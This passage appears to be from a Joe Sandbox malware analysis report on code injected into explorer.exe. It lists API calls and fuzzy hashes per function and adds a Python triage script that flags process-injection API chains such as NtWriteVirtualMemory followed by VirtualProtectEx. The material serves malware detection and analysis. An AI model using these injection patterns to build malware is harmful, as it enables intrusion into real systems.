                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000023.00000002.853027168.0000000000FA1000.00000020.00000001.sdmp, Offset: 00FA1000, based on PE: false
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CreateQueryValue
                                                                                                                                        • String ID: ($(
                                                                                                                                        • API String ID: 2711935003-222463766
                                                                                                                                        • Opcode ID: e12b90d25e48638c248cf623991a1d23c50be5cb427306bedcf9ef54acb60cae
                                                                                                                                        • Instruction ID: 55d362279f93e32794499d01c0ff3480ab9fc1631c224d13e90d5f5b5ebc25f1
                                                                                                                                        • Opcode Fuzzy Hash: e12b90d25e48638c248cf623991a1d23c50be5cb427306bedcf9ef54acb60cae
                                                                                                                                        • Instruction Fuzzy Hash: 9031D574A087898FF304DF54EC99BA6B3E1F799304F00861EE44AC3261DB7C9588DB02
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        APIs
                                                                                                                                        • StrRChrA.KERNELBASE ref: 00FC6E7A
                                                                                                                                        • RtlAddVectoredContinueHandler.NTDLL ref: 00FC6F6E
                                                                                                                                        • RtlRemoveVectoredExceptionHandler.NTDLL ref: 00FC6FA2
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000023.00000002.853027168.0000000000FA1000.00000020.00000001.sdmp, Offset: 00FA1000, based on PE: false
                                                                                                                                        Similarity
                                                                                                                                        • API ID: HandlerVectored$ContinueExceptionRemove
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 133484311-0
                                                                                                                                        • Opcode ID: 18d8ac82230bdfc4302373f1128c0f5960e1e63dc188b60f3db038388c3e2014
                                                                                                                                        • Instruction ID: fe1c9c4b572ad5cd9b0deb7fba1fe1071389aab01689bde9788d24d562a8e8f4
                                                                                                                                        • Opcode Fuzzy Hash: 18d8ac82230bdfc4302373f1128c0f5960e1e63dc188b60f3db038388c3e2014
                                                                                                                                        • Instruction Fuzzy Hash: 56410930A0C7068FEB50EF68A995BAA77E1FB98311F44812ED44AC3271DF38C505DB45
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        APIs
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000023.00000002.853027168.0000000000FA1000.00000020.00000001.sdmp, Offset: 00FA1000, based on PE: false
                                                                                                                                        Similarity
                                                                                                                                        • API ID: LibraryLoad
                                                                                                                                        • String ID: H
                                                                                                                                        • API String ID: 1029625771-2852464175
                                                                                                                                        • Opcode ID: ea8b0be554912eee910b5f6e76d5c63edd561062f2e3a805656d28eae44b2b83
                                                                                                                                        • Instruction ID: caacc96e61f4ab6ddca15ed7269146b093992db9d098805b3cd2854bacb1c81b
                                                                                                                                        • Opcode Fuzzy Hash: ea8b0be554912eee910b5f6e76d5c63edd561062f2e3a805656d28eae44b2b83
                                                                                                                                        • Instruction Fuzzy Hash: 37A16030608B0A9FE755DF58D88876673E2FB99315F08462FD84AC7261EF38D945CB82
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 00FC1458: VirtualProtect.KERNELBASE ref: 00FC148B
                                                                                                                                        • VirtualProtect.KERNELBASE ref: 00FCFFD6
                                                                                                                                        • VirtualProtect.KERNELBASE ref: 00FCFFF9
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000023.00000002.853027168.0000000000FA1000.00000020.00000001.sdmp, Offset: 00FA1000, based on PE: false
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ProtectVirtual
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 544645111-0
                                                                                                                                        • Opcode ID: 8ab32006bd1df6a701864ba7e3d69da663e7aed914991a2a5fb048f6e1491c04
                                                                                                                                        • Instruction ID: ee0ba942066a7f901a99cd63c9f0b6b9a055433c854511b6ac9e5c3659d6f87e
                                                                                                                                        • Opcode Fuzzy Hash: 8ab32006bd1df6a701864ba7e3d69da663e7aed914991a2a5fb048f6e1491c04
                                                                                                                                        • Instruction Fuzzy Hash: 62515A70618B098FDB44EF29D88AB65B7E1FB9C311F14056EA44AC3261DF34E945CB86
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000023.00000002.853027168.0000000000FA1000.00000020.00000001.sdmp, Offset: 00FA1000, based on PE: false
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CloseOpen
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 47109696-0
                                                                                                                                        • Opcode ID: 0bc493057bba55174271d39b91fef6ffa0c4270635545858b5e3c13c28f28606
                                                                                                                                        • Instruction ID: 5c3de5a8ad79a9391de7b665ba029e739cc858e18a960e8fd325fc3f5c05c0ea
                                                                                                                                        • Opcode Fuzzy Hash: 0bc493057bba55174271d39b91fef6ffa0c4270635545858b5e3c13c28f28606
                                                                                                                                        • Instruction Fuzzy Hash: BA318170618B4C8FDB54EF28E88595AB3E5FB98300B014A6EE44BC3251EF38D945DB82
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        APIs
                                                                                                                                        • RegQueryValueExA.KERNELBASE ref: 00FC371F
                                                                                                                                        • RegQueryValueExA.KERNELBASE ref: 00FC37A3
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000023.00000002.853027168.0000000000FA1000.00000020.00000001.sdmp, Offset: 00FA1000, based on PE: false
                                                                                                                                        Similarity
                                                                                                                                        • API ID: QueryValue
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3660427363-0
                                                                                                                                        • Opcode ID: 2d61ef76a0f9e6cd2723d50ffb87ea22aa6033d0a4024559b1a73c32d09c5853
                                                                                                                                        • Instruction ID: 09534bc1bd5e1276772b8e8bf1d9b8ff167e1450a0147f40dc95eeb32c96077a
                                                                                                                                        • Opcode Fuzzy Hash: 2d61ef76a0f9e6cd2723d50ffb87ea22aa6033d0a4024559b1a73c32d09c5853
                                                                                                                                        • Instruction Fuzzy Hash: 21318E7161CB098FDB48EF18D889B66B7E1FBA8311F11856EE849C3251DF34ED418B86
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 00FCA864: RegCreateKeyA.ADVAPI32 ref: 00FCA887
                                                                                                                                        • RegQueryValueExA.KERNELBASE ref: 00FB07C3
                                                                                                                                        • RegCloseKey.KERNELBASE ref: 00FB0833
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000023.00000002.853027168.0000000000FA1000.00000020.00000001.sdmp, Offset: 00FA1000, based on PE: false
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CloseCreateQueryValue
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 4083198587-0
                                                                                                                                        • Opcode ID: 63f8bf2ffbde9439b19e476579ef08d7f0cd75ef32b6588a115372ae452a6d9a
                                                                                                                                        • Instruction ID: e57611ea1929ec2319b59172ff91662faa66e0aad27db70f8fc29ddb0817696f
                                                                                                                                        • Opcode Fuzzy Hash: 63f8bf2ffbde9439b19e476579ef08d7f0cd75ef32b6588a115372ae452a6d9a
                                                                                                                                        • Instruction Fuzzy Hash: 1E210C74718B088FE794EF29E88976677E1FB9C351F10452AA84AC3261EF34D941DB82
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000023.00000002.853027168.0000000000FA1000.00000020.00000001.sdmp, Offset: 00FA1000, based on PE: false
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CreateOpen
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 436179556-0
                                                                                                                                        • Opcode ID: 0fd58de01818f39c689c8671fe547acd9089d8ae02dcc106006c6a54173f430a
                                                                                                                                        • Instruction ID: 773a04941e8986ad23ab0846441ece6a358da75264984b0e97432e6a3b2dc7eb
                                                                                                                                        • Opcode Fuzzy Hash: 0fd58de01818f39c689c8671fe547acd9089d8ae02dcc106006c6a54173f430a
                                                                                                                                        • Instruction Fuzzy Hash: D001D634A08A098FDB44EB5CD488B69B7E1FBEC315F10442EE88DC3361DAB4D9418783
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000023.00000002.853027168.0000000000FA1000.00000020.00000001.sdmp, Offset: 00FA1000, based on PE: false
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ProtectVirtual
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 544645111-0
                                                                                                                                        • Opcode ID: 6aa1d7655563690a4da4f05cca64eafe950653d6a721fc7ea7dd1fa497ac3de5
                                                                                                                                        • Instruction ID: 8652e7eb40d7c087f3e9f10e7649dfe14ae2b85586ed9793b52a0ce181e43f96
                                                                                                                                        • Opcode Fuzzy Hash: 6aa1d7655563690a4da4f05cca64eafe950653d6a721fc7ea7dd1fa497ac3de5
                                                                                                                                        • Instruction Fuzzy Hash: 23617F3061CF099FD794EF19E885AA6B3E1FBA8311B50455EE84AC3661DB34E8418BC6
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000023.00000002.853027168.0000000000FA1000.00000020.00000001.sdmp, Offset: 00FA1000, based on PE: false
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CreateProcess
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 963392458-0
                                                                                                                                        • Opcode ID: 3c5b31f2ade86ff256e9c3c63348cc97b153446f68cd2a262a3ba859843ab9a0
                                                                                                                                        • Instruction ID: bfb3aa6189c989052a89d8273d258db0f1bc6387564de403acadbb647bc6b851
                                                                                                                                        • Opcode Fuzzy Hash: 3c5b31f2ade86ff256e9c3c63348cc97b153446f68cd2a262a3ba859843ab9a0
                                                                                                                                        • Instruction Fuzzy Hash: 0A312F7060CB484FDB58EF1CD885B65B7E1FB99711F04466EE84DC3262DA70ED418B86
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000023.00000002.853027168.0000000000FA1000.00000020.00000001.sdmp, Offset: 00FA1000, based on PE: false
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Sleep
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3472027048-0
                                                                                                                                        • Opcode ID: 52f1519f99e7b6274678f0f96dd7df39cf1b8b21fb562168254a445fe9a10dfd
                                                                                                                                        • Instruction ID: 1117177867ba6712a44a063a942c8aaf880b427ed086506e7f9a3de929b683c7
                                                                                                                                        • Opcode Fuzzy Hash: 52f1519f99e7b6274678f0f96dd7df39cf1b8b21fb562168254a445fe9a10dfd
                                                                                                                                        • Instruction Fuzzy Hash: 1C3170347546448BAB68EF29ECD5A6A73E6FB983007244039A407C3651DF3CE8079B42
Uniqueness

Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000023.00000002.853027168.0000000000FA1000.00000020.00000001.sdmp, Offset: 00FA1000, based on PE: false
Similarity
• API ID: ProtectVirtual
• String ID:
• API String ID: 544645111-0
• Opcode ID: 4a765497a387f33308d21eb6f57c50523c4476f30fd5c9db11123bb1565e96cc
• Instruction ID: b2ae2ceb9522b46746ebcad4e403e82eb7e25c967c61710fc83714b67106a2e4
• Opcode Fuzzy Hash: 4a765497a387f33308d21eb6f57c50523c4476f30fd5c9db11123bb1565e96cc
• Instruction Fuzzy Hash: 4011813160CB088F9B18EF59E8865A5B3E5FB9D316700452DE94EC3256EA30ED05CBC2
Uniqueness

Uniqueness Score: -1.00%

APIs
  • Part of subcall function 00FCA864: RegCreateKeyA.ADVAPI32 ref: 00FCA887
• RegQueryValueExA.KERNELBASE ref: 00FB63E2
Memory Dump Source
• Source File: 00000023.00000002.853027168.0000000000FA1000.00000020.00000001.sdmp, Offset: 00FA1000, based on PE: false
Similarity
• API ID: CreateQueryValue
• String ID:
• API String ID: 2711935003-0
• Opcode ID: a38569a501b8e0ec64ed77100791f3d441e58a8fbacd49a898224bfc5fb91074
• Instruction ID: a6ebc8827be0fb7b9b93e5ad339aefbfed78ce4eab8d8aa6c76c5aebf42cdf3b
• Opcode Fuzzy Hash: a38569a501b8e0ec64ed77100791f3d441e58a8fbacd49a898224bfc5fb91074
• Instruction Fuzzy Hash: 47212E30518B488FE755EF65D888BAAB7E1FB98305F50092EF48AC3250EBB8D545DF42
Uniqueness

Uniqueness Score: -1.00%

APIs
  • Part of subcall function 00FB3830: NtWriteVirtualMemory.NTDLL ref: 00FB384F
• VirtualProtectEx.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00FAFBE4
Memory Dump Source
• Source File: 00000023.00000002.853027168.0000000000FA1000.00000020.00000001.sdmp, Offset: 00FA1000, based on PE: false
Similarity
• API ID: Virtual$MemoryProtectWrite
• String ID:
• API String ID: 1789425917-0
• Opcode ID: 0ce16aded698ca03c3b82ecaa6156b11d5de4fcc1feac8faaa761be50cfad355
• Instruction ID: 251e2b38473e418956f29e65199f83db6c9265c0ededbd271370030b12545c14
• Opcode Fuzzy Hash: 0ce16aded698ca03c3b82ecaa6156b11d5de4fcc1feac8faaa761be50cfad355
• Instruction Fuzzy Hash: 2B015A70A18B088FCB48EF99A0C552AB7E0EB9C310B4005AEE84DC7256CA74DD45CB86
Uniqueness

Uniqueness Score: -1.00%

APIs
• FindCloseChangeNotification.KERNELBASE ref: 00FAA97D
Memory Dump Source
• Source File: 00000023.00000002.853027168.0000000000FA1000.00000020.00000001.sdmp, Offset: 00FA1000, based on PE: false
Similarity
• API ID: ChangeCloseFindNotification
• String ID:
• API String ID: 2591292051-0
• Opcode ID: bfcf9b11c8a571321a20197ae80eed82d55b94b58a0f7e34586d0728a82784e3
• Instruction ID: e32f8474dfafc9db6fb7b57a2b62a8058e7652a3af08ab8255c7d3fd5c0d9428
• Opcode Fuzzy Hash: bfcf9b11c8a571321a20197ae80eed82d55b94b58a0f7e34586d0728a82784e3
• Instruction Fuzzy Hash: A5F0C274718B0A4BEB98DF68D484A2EB7E1FBDC311F44592DB506C3250CF74C8058B02
Uniqueness

Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000023.00000002.853027168.0000000000FA1000.00000020.00000001.sdmp, Offset: 00FA1000, based on PE: false
Similarity
• API ID: lstrcmp
• String ID:
• API String ID: 1534048567-0
• Opcode ID: 1608627adbaccf2637d2de6840cab0dcfe8de2003ac308ffa53b0243ab2e23b6
• Instruction ID: 3b63c21f29ab4aed24307d2b153d3ecc9011af2cf491e8206e0124c5b5812aa9
• Opcode Fuzzy Hash: 1608627adbaccf2637d2de6840cab0dcfe8de2003ac308ffa53b0243ab2e23b6
• Instruction Fuzzy Hash: 8B61813161CB4A8FC758DF18C486B7AB7F1FB99754F14462EE48A83211DB30E946DB82
Uniqueness

Uniqueness Score: -1.00%

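The function blocks above record, per recovered function in the explorer.exe memory dump, which Win32 and native APIs it reaches (directly or through a subcall) together with opcode and instruction fuzzy hashes that can be matched against other samples. The block tagged Virtual$MemoryProtectWrite is the one worth a second look: NtWriteVirtualMemory in a subcall followed by VirtualProtectEx is the write-then-make-executable half of a remote code injection, which is consistent with the "Writes to foreign memory regions" and "Changes memory attributes in foreign processes" signatures in the report summary. As an added example, not part of the Joe Sandbox report or its tooling, the Python below parses blocks in this layout and flags functions whose API set forms a known injection chain or a registry read. The sample text is a constructed excerpt in the same layout as the page; the parser, the INJECTION_CHAINS table and the REGISTRY_READ set are assumptions of this example, not anything the sandbox emits.

```python
"""Triage helper for Joe Sandbox-style per-function API metadata blocks.

Added example: not code from the sandbox vendor or from the analysed sample.
It parses "APIs / Memory Dump Source / Similarity / Uniqueness" blocks and
tags functions whose referenced APIs form an injection primitive chain.
"""
import re
from dataclasses import dataclass, field

# Constructed excerpt in the layout of the report blocks (lines mirror the
# CreateQueryValue, Virtual$MemoryProtectWrite and ChangeCloseFindNotification
# entries on the page); used here as offline sample input.
SAMPLE_REPORT = """\
APIs
  • Part of subcall function 00FCA864: RegCreateKeyA.ADVAPI32 ref: 00FCA887
• RegQueryValueExA.KERNELBASE ref: 00FB63E2
Memory Dump Source
• Source File: 00000023.00000002.853027168.0000000000FA1000.00000020.00000001.sdmp, Offset: 00FA1000, based on PE: false
Similarity
• API ID: CreateQueryValue
• String ID:
• API String ID: 2711935003-0
• Opcode ID: a38569a501b8e0ec64ed77100791f3d441e58a8fbacd49a898224bfc5fb91074
• Instruction Fuzzy Hash: 47212E30518B488FE755EF65D888BAAB7E1FB98305F50092EF48AC3250EBB8D545DF42
Uniqueness

Uniqueness Score: -1.00%

APIs
  • Part of subcall function 00FB3830: NtWriteVirtualMemory.NTDLL ref: 00FB384F
• VirtualProtectEx.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00FAFBE4
Memory Dump Source
• Source File: 00000023.00000002.853027168.0000000000FA1000.00000020.00000001.sdmp, Offset: 00FA1000, based on PE: false
Similarity
• API ID: Virtual$MemoryProtectWrite
• String ID:
• API String ID: 1789425917-0
• Opcode ID: 0ce16aded698ca03c3b82ecaa6156b11d5de4fcc1feac8faaa761be50cfad355
• Instruction Fuzzy Hash: 2B015A70A18B088FCB48EF99A0C552AB7E0EB9C310B4005AEE84DC7256CA74DD45CB86
Uniqueness

Uniqueness Score: -1.00%

APIs
• FindCloseChangeNotification.KERNELBASE ref: 00FAA97D
Memory Dump Source
• Source File: 00000023.00000002.853027168.0000000000FA1000.00000020.00000001.sdmp, Offset: 00FA1000, based on PE: false
Similarity
• API ID: ChangeCloseFindNotification
• Opcode ID: bfcf9b11c8a571321a20197ae80eed82d55b94b58a0f7e34586d0728a82784e3
Uniqueness

Uniqueness Score: -1.00%
"""

# One API reference line, e.g.
#   • Part of subcall function 00FB3830: NtWriteVirtualMemory.NTDLL ref: 00FB384F
#   • VirtualProtectEx.KERNELBASE(?,?,?), ref: 00FAFBE4
API_RE = re.compile(
    r"^•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<name>\w+)\.(?P<module>\w+)(?:\([^)]*\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)$"
)
# One "• Key: value" line from the Similarity section.
FIELD_RE = re.compile(r"^•\s*(?P<key>[^:]+):\s*(?P<val>.*)$")


@dataclass
class Call:
    name: str        # API name as written in the report, e.g. VirtualProtectEx
    module: str      # exporting module, e.g. KERNELBASE or NTDLL
    ref: str         # call-site address inside the dump
    via_subcall: bool  # True when reached through a "Part of subcall function" entry


@dataclass
class FunctionBlock:
    api_id: str = ""
    opcode_id: str = ""
    instruction_fuzzy_hash: str = ""
    calls: list = field(default_factory=list)

    def api_names(self) -> set:
        return {c.name for c in self.calls}


def parse_blocks(text: str) -> list:
    """Split report text into FunctionBlock objects, one per "APIs" header."""
    blocks, current, section = [], None, None
    for raw in text.splitlines():
        line = raw.strip()
        if line == "APIs":                       # a new function block starts here
            current = FunctionBlock()
            blocks.append(current)
            section = "APIs"
            continue
        if line in ("Memory Dump Source", "Similarity", "Uniqueness"):
            section = line
            continue
        if current is None or not line.startswith("•"):
            continue                             # scores, blanks, anything unbulleted
        if section == "APIs":
            m = API_RE.match(line)
            if m:
                current.calls.append(Call(m["name"], m["module"], m["ref"], m["sub"] is not None))
        elif section == "Similarity":
            m = FIELD_RE.match(line)
            if m:
                key, val = m["key"].strip(), m["val"].strip()
                if key == "API ID":
                    current.api_id = val
                elif key == "Opcode ID":
                    current.opcode_id = val
                elif key == "Instruction Fuzzy Hash":
                    current.instruction_fuzzy_hash = val
    return blocks


# Assumed triage table: API sets that together form a classic injection chain.
INJECTION_CHAINS = {
    "write-then-make-executable": {"NtWriteVirtualMemory", "VirtualProtectEx"},
    "alloc-write-thread": {"VirtualAllocEx", "WriteProcessMemory", "CreateRemoteThread"},
    "map-section": {"NtCreateSection", "NtMapViewOfSection"},
}
REGISTRY_READ = {"RegCreateKeyA", "RegCreateKeyW", "RegOpenKeyExA", "RegOpenKeyExW",
                 "RegQueryValueExA", "RegQueryValueExW"}


def classify(block: FunctionBlock) -> list:
    """Tags for one block: every chain fully present in its API set, plus registry reads."""
    names = block.api_names()
    tags = [label for label, needed in INJECTION_CHAINS.items() if needed <= names]
    if names & REGISTRY_READ:
        tags.append("registry-read")
    return tags


def triage(text: str) -> dict:
    """Map Opcode ID -> tags for every block that earned at least one tag."""
    result = {}
    for block in parse_blocks(text):
        tags = classify(block)
        if tags:
            result[block.opcode_id] = tags
    return result


if __name__ == "__main__":
    for opcode_id, tags in triage(SAMPLE_REPORT).items():
        print(opcode_id[:16], tags)
```

The Opcode ID is used as the key because it survives re-analysis of the same code in a different dump, so a tagged ID can be carried into a case file or compared across sandbox runs; the instruction fuzzy hash is kept on the block for the looser, similarity-based comparison.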
Non-executed Functions